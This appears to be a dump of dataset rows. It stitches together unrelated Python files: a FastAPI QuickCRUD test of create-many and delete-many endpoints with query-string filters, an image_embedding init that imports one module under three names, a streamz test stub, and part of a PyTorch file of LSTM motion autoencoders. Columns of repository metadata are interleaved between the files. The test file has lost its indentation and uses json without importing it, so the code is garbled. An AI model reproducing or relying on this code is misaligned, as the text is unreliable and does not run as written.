from collections import OrderedDict
from starlette.testclient import TestClient
from src.fastapi_quickcrud import sqlalchemy_to_pydantic
from src.fastapi_quickcrud.crud_router import crud_router_builder
from src.fastapi_quickcrud.misc.type import CrudMethods
from tests.test_implementations.test_sqlalchemy.api_test import get_transaction_session, app, UntitledTable256
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.UPSERT_ONE
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_create_one = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_creation_one",
tags=["test"]
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.UPSERT_MANY,
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
test_create_many = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_creation_many",
tags=["test"]
)
# Response Mode Test
# response_many = create_many_response_model['__root__'].sub_fields[0].outer_type_.__dict__['__fields__']
# for k, v in response_many.items():
# assert not v.required
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.POST_REDIRECT_GET
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
# Model Test
# api_model = UntitledTable256Model.__dict__['POST']
# assert api_model
# post_redirect_get_model = api_model[CrudMethods.POST_REDIRECT_GET].__dict__
# assert post_redirect_get_model['requestModel'] or post_redirect_get_model['responseModel']
# post_redirect_get_request_model = deepcopy(post_redirect_get_model['requestModel'].__dict__['__fields__'])
# post_redirect_get_response_model = deepcopy(post_redirect_get_model['responseModel'].__dict__['__fields__'])
# Request Model Test
# for k, v in post_redirect_get_request_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
# Response Model Test
# for k, v in post_redirect_get_response_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
# for k, v in post_redirect_get_response_model.items():
# assert v.required
test_post_and_redirect_get = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_post_direct_get",
tags=["test"]
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.FIND_ONE
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
# # # Model Test
# api_model = UntitledTable256Model.__dict__['GET']
# assert api_model
# get_one_model = api_model[CrudMethods.FIND_ONE].__dict__
# assert get_one_model['requestModel'] or get_one_model['responseModel']
# get_one_request_model = deepcopy(get_one_model['requestModel'].__dict__['__fields__'])
# get_one_response_model = deepcopy(get_one_model['responseModel'].__dict__['__fields__'])
# primary_key_of_get_sql_schema = get_one_request_model[UntitledTable256.__dict__['primary_key_of_table']]
# assert not primary_key_of_get_sql_schema.required
# get_one_request_model.pop(UntitledTable256.__dict__['primary_key_of_table'], None)
# for k, v in get_one_request_model.items():
# assert not v.required
# # FIXME some thing may not require
# for k, v in get_one_response_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
test_get_data = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test",
tags=["test"]
)
UntitledTable256Model = sqlalchemy_to_pydantic(UntitledTable256,
crud_methods=[
CrudMethods.DELETE_MANY
],
exclude_columns=['bytea_value', 'xml_value', 'box_valaue'])
# # # Model Test
# api_model = UntitledTable256Model.__dict__['GET']
# assert api_model
# get_one_model = api_model[CrudMethods.FIND_ONE].__dict__
# assert get_one_model['requestModel'] or get_one_model['responseModel']
# get_one_request_model = deepcopy(get_one_model['requestModel'].__dict__['__fields__'])
# get_one_response_model = deepcopy(get_one_model['responseModel'].__dict__['__fields__'])
# primary_key_of_get_sql_schema = get_one_request_model[UntitledTable256.__dict__['primary_key_of_table']]
# assert not primary_key_of_get_sql_schema.required
# get_one_request_model.pop(UntitledTable256.__dict__['primary_key_of_table'], None)
# for k, v in get_one_request_model.items():
# assert not v.required
# # FIXME some thing may not require
# for k, v in get_one_response_model.items():
# sql_schema = UntitledTable256.__dict__[v.name].comparator
#
# if sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif not sql_schema.nullable and sql_schema.server_default or sql_schema.default:
# assert not v.required
# elif sql_schema.nullable:
# assert not v.required
# elif not sql_schema.nullable:
# assert v.required
# elif not sql_schema.nullable and not sql_schema.server_default or not sql_schema.default:
# assert v.required
# else:
# print(f"{v.name=}")
# print(f"{v.required=}")
# print(f"{v.default=}")
test_delete_data = crud_router_builder(db_session=get_transaction_session,
db_model=UntitledTable256,
crud_models=UntitledTable256Model,
prefix="/test_delete_many",
tags=["test"]
)
[app.include_router(i) for i in [test_post_and_redirect_get, test_delete_data, test_create_one, test_create_many, test_get_data]]
client = TestClient(app)
primary_key_name = UntitledTable256.primary_key_of_table
unique_fields = UntitledTable256.unique_fields
def test_create_many_and_delete_many():
headers = {
'accept': 'application/json',
'Content-Type': 'application/json',
}
data = { "insert": [ { "bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285Z", "timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string", "array_value": [ 0 ],
"array_str__value": [ "string" ], "time_value": "18:18:18" , "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string", "time_value": "18:18:18",
"timestamp_value": "2021-07-24T02:54:53.285Z",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285Z",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "time_value": "18:18:18", "timetz_value": "18:18:18+00:00"},
] }
response = client.post('/test_creation_many', headers=headers, data=json.dumps(data))
assert response.status_code == 201
insert_response_data = response.json()
primary_key_list = [i[primary_key_name] for i in insert_response_data]
min_key = min(primary_key_list)
max_key = max(primary_key_list)
params = {"primary_key____from": min_key,
"primary_key____to": max_key,
"bool_value____list":True,
"char_value____str": 'string%',
"char_value____str_____matching_pattern": 'case_sensitive',
"date_value____from": "2021-07-22",
"date_value____to": "2021-07-25",
"float4_value____from": -1,
"float4_value____to": 2,
"float4_value____list": 0,
"float8_value____from": -1,
"float8_value____to": 2,
"float8_value____list": 0,
"int2_value____from": -1,
"int2_value____to": 9,
"int2_value____list": 0,
"int4_value____from": -1,
"int4_value____to": 9,
"int4_value____list": 0,
"int8_value____from": -1,
"int8_value____to": 9,
"int8_value____list": 0,
"interval_value____from": -1,
"interval_value____to": 9,
"interval_value____list": 0,
"numeric_value____from": -1,
"numeric_value____to": 9,
"numeric_value____list": 0,
"text_value____list": "string",
"time_value____from": '18:18:18',
"time_value____to": '18:18:18',
"time_value____list": '18:18:18',
"timestamp_value_value____from": "2021-07-24T02:54:53.285",
"timestamp_value_value____to": "2021-07-24T02:54:53.285",
"timestamp_value_value____list": "2021-07-24T02:54:53.285",
"timestamptz_value_value____from": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____to": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____list": "2021-07-24T02:54:53.285Z",
"uuid_value_value____list": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"time_value____from": '18:18:18+00:00',
"time_value____to": '18:18:18+00:00',
"time_value____list": '18:18:18+00:00',
"varchar_value____str": 'string',
"varchar_value____str_____matching_pattern": 'case_sensitive',
"varchar_value____list": 'string',
}
from urllib.parse import urlencode
query_string = urlencode(OrderedDict(**params))
response = client.delete(f'/test_delete_many?{query_string}')
assert response.status_code == 200
assert response.headers['x-total-count'] == '3'
def test_create_many_and_delete_many_but_not_found():
headers = {
'accept': 'application/json',
'Content-Type': 'application/json',
}
data = { "insert": [ { "bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285", "timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string", "array_value": [ 0 ],
"array_str__value": [ "string" ], "time_value": "18:18:18" , "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string", "time_value": "18:18:18",
"timestamp_value": "2021-07-24T02:54:53.285",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "timetz_value": "18:18:18+00:00"},
{"bool_value": True, "char_value": "string", "date_value": "2021-07-24", "float4_value": 0,
"float8_value": 0, "int2_value": 0, "int4_value": 0, "int8_value": 0, "interval_value": 0,
"json_value": {}, "jsonb_value": {}, "numeric_value": 0, "text_value": "string",
"timestamp_value": "2021-07-24T02:54:53.285",
"timestamptz_value": "2021-07-24T02:54:53.285Z",
"uuid_value": "3fa85f64-5717-4562-b3fc-2c963f66afa6", "varchar_value": "string",
"array_value": [0], "array_str__value": ["string"], "time_value": "18:18:18", "timetz_value": "18:18:18+00:00"},
] }
response = client.post('/test_creation_many', headers=headers, data=json.dumps(data))
assert response.status_code == 201
insert_response_data = response.json()
primary_key_list = [i[primary_key_name] for i in insert_response_data]
min_key = min(primary_key_list)
max_key = max(primary_key_list)
params = {"primary_key____from": min_key,
"primary_key____to": max_key,
"bool_value____list":True,
"char_value____str": 'string%',
"char_value____str_____matching_pattern": 'case_sensitive',
"date_value____from": "2021-07-22",
"date_value____to": "2021-07-25",
"float4_value____from": -1,
"float4_value____to": 2,
"float4_value____list": 0,
"float8_value____from": -1,
"float8_value____to": 2,
"float8_value____list": 0,
"int2_value____from": -1,
"int2_value____to": 9,
"int2_value____list": 0,
"int4_value____from": -1,
"int4_value____to": 9,
"int4_value____list": 0,
"int8_value____from": -1,
"int8_value____to": 9,
"int8_value____list": 0,
"interval_value____from": -1,
"interval_value____to": 9,
"interval_value____list": 0,
"numeric_value____from": -1,
"numeric_value____to": 9,
"numeric_value____list": 0,
"text_value____list": "string",
"time_value____from": '10:18:18',
"time_value____to": '12:18:18',
"time_value____list": '12:18:18',
"timestamp_value_value____from": "2021-07-24T02:54:53.285",
"timestamp_value_value____to": "2021-07-24T02:54:53.285",
"timestamp_value_value____list": "2021-07-24T02:54:53.285",
"timestamptz_value_value____from": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____to": "2021-07-24T02:54:53.285Z",
"timestamptz_value_value____list": "2021-07-24T02:54:53.285Z",
"uuid_value_value____list": "3fa85f64-5717-4562-b3fc-2c963f66afa6",
"timez_value____from": '18:18:18+00:00',
"timez_value____to": '18:18:18+00:00',
"timez_value____list": '18:18:18+00:00',
"varchar_value____str": 'string',
"varchar_value____str_____matching_pattern": 'case_sensitive',
"varchar_value____list": 'string',
}
from urllib.parse import urlencode
query_string = urlencode(OrderedDict(**params))
response = client.delete(f'/test_delete_many?{query_string}')
assert response.status_code == 204
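# NOTE (observation on the filter grammar exercised above): query parameters
# encode range filters as '<column>____from' / '<column>____to', set membership
# as '<column>____list', and string matching as '<column>____str' plus a
# '<column>____str_____matching_pattern' companion. The first test's filters
# match the three inserted rows, so DELETE answers 200 with
# x-total-count == '3'; the second shifts the time_value range away from the
# inserted '18:18:18' rows, so nothing matches and the server answers 204.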
| 52.752
| 138
| 0.579769
| 2,194
| 19,782
| 4.709207
| 0.080675
| 0.041812
| 0.025552
| 0.030197
| 0.913376
| 0.89005
| 0.879597
| 0.865079
| 0.857433
| 0.843399
| 0
| 0.08069
| 0.302093
| 19,782
| 374
| 139
| 52.893048
| 0.667681
| 0.243909
| 0
| 0.766234
| 0
| 0
| 0.358135
| 0.115379
| 0
| 0
| 0
| 0.002674
| 0.021645
| 1
| 0.008658
| false
| 0
| 0.038961
| 0
| 0.047619
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b927b629b68e7a8fba10bb4c8df026b9bb3256b5
| 109
|
py
|
Python
|
test/test_dask.py
|
xpdAcq/streamz_ext
|
9c3b41fdcca3dc7deea6d3f5523fee315af71211
|
[
"BSD-3-Clause"
] | 1
|
2018-10-02T02:37:19.000Z
|
2018-10-02T02:37:19.000Z
|
test/test_dask.py
|
xpdAcq/streamz_ext
|
9c3b41fdcca3dc7deea6d3f5523fee315af71211
|
[
"BSD-3-Clause"
] | 31
|
2018-01-17T15:54:32.000Z
|
2018-10-24T17:11:28.000Z
|
test/test_dask.py
|
xpdAcq/streamz_ext
|
9c3b41fdcca3dc7deea6d3f5523fee315af71211
|
[
"BSD-3-Clause"
] | 4
|
2018-01-16T19:27:49.000Z
|
2018-08-20T08:58:06.000Z
|
from streamz_ext.dask import *
try:
from zstreamz.tests.test_dask import *
except ImportError:
pass
| 15.571429
| 42
| 0.743119
| 15
| 109
| 5.266667
| 0.8
| 0.253165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.192661
| 109
| 6
| 43
| 18.166667
| 0.897727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.2
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
b97ee0d4e1d6bbf563e9bcf4d1a8ceca18f7d4ec
| 163
|
py
|
Python
|
image_embedding/__init__.py
|
newTypeGeek/face-recognition
|
235cf4aaf60ba3504b0e73dbab5f9dc4c7cc3dbd
|
[
"Apache-2.0"
] | 5
|
2020-02-10T04:38:40.000Z
|
2021-09-01T18:50:18.000Z
|
image_embedding/__init__.py
|
newTypeGeek/face-recognition
|
235cf4aaf60ba3504b0e73dbab5f9dc4c7cc3dbd
|
[
"Apache-2.0"
] | 1
|
2020-06-11T18:26:38.000Z
|
2020-06-11T18:26:38.000Z
|
image_embedding/__init__.py
|
newTypeGeek/face-recognition
|
235cf4aaf60ba3504b0e73dbab5f9dc4c7cc3dbd
|
[
"Apache-2.0"
] | 3
|
2019-06-24T12:30:12.000Z
|
2020-02-10T04:39:59.000Z
|
import image_embedding.gen_vec_start as gen_vec_start
import image_embedding.gen_vec_start as gen_vec_register
import image_embedding.gen_vec_start as gen_vec_add
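# NOTE: all three aliases above bind to the same module,
# image_embedding.gen_vec_start; if gen_vec_register and gen_vec_add exist as
# separate modules, the second and third imports look like a copy-paste slip.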
| 40.75
| 56
| 0.907975
| 30
| 163
| 4.433333
| 0.3
| 0.270677
| 0.330827
| 0.518797
| 0.879699
| 0.879699
| 0.879699
| 0.879699
| 0.879699
| 0
| 0
| 0
| 0.07362
| 163
| 3
| 57
| 54.333333
| 0.880795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 12
|
b9888d59363084951d8e976657780d58aa863105
| 21,696
|
py
|
Python
|
motionAE/src/models.py
|
meaten/MotionAug
|
ac7d5fa3e5ade1dffca8db50c1281e9a4a747b62
|
[
"MIT"
] | 24
|
2022-03-18T08:03:11.000Z
|
2022-03-30T05:11:26.000Z
|
motionAE/src/models.py
|
meaten/MotionAug
|
ac7d5fa3e5ade1dffca8db50c1281e9a4a747b62
|
[
"MIT"
] | 1
|
2022-03-28T06:39:46.000Z
|
2022-03-29T03:40:01.000Z
|
motionAE/src/models.py
|
meaten/MotionAug
|
ac7d5fa3e5ade1dffca8db50c1281e9a4a747b62
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
torch.manual_seed(1)
class lstmEncoder_wo_Norm(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmEncoder_wo_Norm, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
out = self.activation(self.linear1(out))
z = self.linear2(out)
return z
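# Illustrative usage (a sketch; forward() calls .cuda(), so a CUDA device is
# assumed, and the shapes below are ours, not the repo's):
#
# enc = lstmEncoder_wo_Norm(input_len=60, dim=63, dim_z=32).cuda()
# x = torch.zeros(8, 60, 63).cuda()   # padded batch: (batch, time, features)
# lengths = torch.full((8,), 60)      # true sequence lengths (kept on CPU)
# z = enc(x, lengths)                 # -> (8, 32) latent codes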
class lstmEncoder(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmEncoder, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.norm = nn.LayerNorm([self.input_len, self.dim])
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.norm(x)
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
out = self.activation(self.linear1(out))
z = self.linear2(out)
return z
class lstmEncoder_vae(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmEncoder_vae, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.norm = nn.LayerNorm([self.input_len, self.dim])
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.mu_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.mu_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.log_var_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.log_var_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths):
x = self.norm(x)
x = self.activation(self.linear(x))
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
mu = self.activation(self.mu_linear1(out))
mu = self.mu_linear2(mu)
log_var = self.activation(self.log_var_linear1(out))
log_var = self.log_var_linear2(log_var)
return [mu, log_var]
class lstmEncoder_cvae(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num, dropout=0.0):
super(lstmEncoder_cvae, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.class_num = class_num
self.linear = nn.Linear(
in_features=self.dim + self.class_num,
out_features=self.dim + self.class_num
)
# self.norm = nn.BatchNorm1d(self.dim)
self.norm = nn.LayerNorm([self.input_len, self.dim + self.class_num])
self.rnn = nn.LSTM(
input_size=self.dim + self.class_num,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=True
)
self.mu_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.mu_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.log_var_linear1 = nn.Linear(
in_features=self.dim_z * 4,
out_features=self.dim_z * 2
)
self.log_var_linear2 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, x, x_lengths, class_vector):
"""
x = x.permute(0, 2, 1)
x = self.norm(x)
x = x.permute(0, 2, 1)
"""
x = torch.cat((x, class_vector[:, None, :].expand(-1, self.input_len, -1)), 2)
x = self.activation(self.linear(x))
x = self.norm(x)
x = torch.nn.utils.rnn.pack_padded_sequence(x, x_lengths, batch_first=True, enforce_sorted=False)
out, (_, _) = self.rnn(x)
out, out_lengths = torch.nn.utils.rnn.pad_packed_sequence(out, batch_first=True)
out = torch.sum(out, dim=1) / out_lengths[:, None].type(torch.FloatTensor).cuda()
mu = self.activation(self.mu_linear1(out))
mu = self.mu_linear2(mu)
log_var = self.activation(self.log_var_linear1(out))
log_var = self.log_var_linear2(log_var)
return [mu, log_var]
class Encoder_c(nn.Module):
def __init__(self, dim_z, class_num):
super(Encoder_c, self).__init__()
self.dim_z = dim_z
self.class_num = class_num
self.mu_linear1 = nn.Linear(
in_features=self.class_num,
out_features=int(self.dim_z / 2)
)
self.mu_linear2 = nn.Linear(
in_features=int(self.dim_z / 2),
out_features=self.dim_z
)
self.log_var_linear1 = nn.Linear(
in_features=self.class_num,
out_features=int(self.dim_z / 2)
)
self.log_var_linear2 = nn.Linear(
in_features=int(self.dim_z / 2),
out_features=self.dim_z
)
self.activation = nn.ReLU()
def forward(self, class_vector):
mu = self.activation(self.mu_linear1(class_vector))
mu = self.mu_linear2(mu)
log_var = self.activation(self.log_var_linear1(class_vector))
log_var = self.log_var_linear2(log_var)
return [mu, log_var]
class lstmDecoder(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0):
super(lstmDecoder, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.linear = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.rnn = nn.LSTM(
input_size=self.dim_z,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=False
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x):
x = self.activation(self.linear(x))
x = x[:, None, :].expand(-1, self.input_len, -1)
out, (_, _) = self.rnn(x)
out = self.activation(self.linear1(out))
recon = self.linear2(out)
return recon
class lstmDecoder_c(nn.Module):
def __init__(self, input_len, dim, dim_z, class_num, dropout=0.0):
super(lstmDecoder_c, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.class_num = class_num
self.linear = nn.Linear(
in_features=self.dim_z + self.class_num,
out_features=self.dim_z + self.class_num)
self.rnn = nn.LSTM(
input_size=self.dim_z + self.class_num,
hidden_size=self.dim_z * 2,
num_layers=1,
batch_first=True,
dropout=dropout,
bidirectional=False
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x, class_vector):
x = torch.cat((x, class_vector), 1)
x = self.activation(self.linear(x))
x = x[:, None, :].expand(-1, self.input_len, -1)
out, (_, _) = self.rnn(x)
out = self.activation(self.linear1(out))
recon = self.linear2(out)
return recon
class lstmDecoder_feedback(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0, residual=False):
super(lstmDecoder_feedback, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.residual = residual
self.linear = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.pose_linear1 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.pose_linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim
)
self.rnn_cell = nn.LSTMCell(
input_size=self.dim_z + self.dim,
hidden_size=self.dim_z * 2
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x):
outputs = []
x = self.activation(self.linear(x))
pose = self.activation(self.pose_linear1(x))
pose = self.pose_linear2(pose)
batch_size, _ = x.size()
input = torch.cat((x, pose), 1)
(h, c) = [torch.zeros(batch_size, self.dim_z * 2).cuda()] * 2
for i in range(self.input_len):
(h, c) = self.rnn_cell(input, (h, c))
h_ = self.activation(self.linear1(h))
if self.residual:
pose = self.linear2(h_) + pose
else:
pose = self.linear2(h_)
outputs += [pose]
input = torch.cat((x, pose), 1)
outputs = torch.stack(outputs, 1)
return outputs
class lstmDecoder_initfeed(nn.Module):
def __init__(self, input_len, dim, dim_z, dropout=0.0, residual=False):
super(lstmDecoder_initfeed, self).__init__()
self.input_len = input_len
self.dim = dim
self.dim_z = dim_z
self.residual = residual
self.linear = nn.Linear(
in_features=self.dim_z,
out_features=self.dim_z
)
self.rnn_cell = nn.LSTMCell(
input_size=self.dim_z + self.dim,
hidden_size=self.dim_z * 2
)
self.linear1 = nn.Linear(
in_features=self.dim_z * 2,
out_features=self.dim_z)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=self.dim)
self.activation = nn.ReLU()
def forward(self, x, pose):
outputs = []
x = self.activation(self.linear(x))
batch_size, _ = x.size()
input = torch.cat((x, pose), 1)
(h, c) = [torch.zeros(batch_size, self.dim_z * 2).cuda()] * 2
for i in range(self.input_len):
(h, c) = self.rnn_cell(input, (h, c))
h_ = self.activation(self.linear1(h))
if self.residual:
pose = self.linear2(h_) + pose
else:
pose = self.linear2(h_)
outputs += [pose]
input = torch.cat((x, pose), 1)
outputs = torch.stack(outputs, 1)
return outputs
class Discriminator_frame(nn.Module):
def __init__(self, dim, dim_z):
super(Discriminator_frame, self).__init__()
self.dim = dim
self.dim_z = dim_z
self.linear1 = nn.Linear(
in_features=self.dim,
out_features=self.dim_z
)
self.linear2 = nn.Linear(
in_features=self.dim_z,
out_features=1
)
self.activation = nn.ReLU()
def forward(self, x):
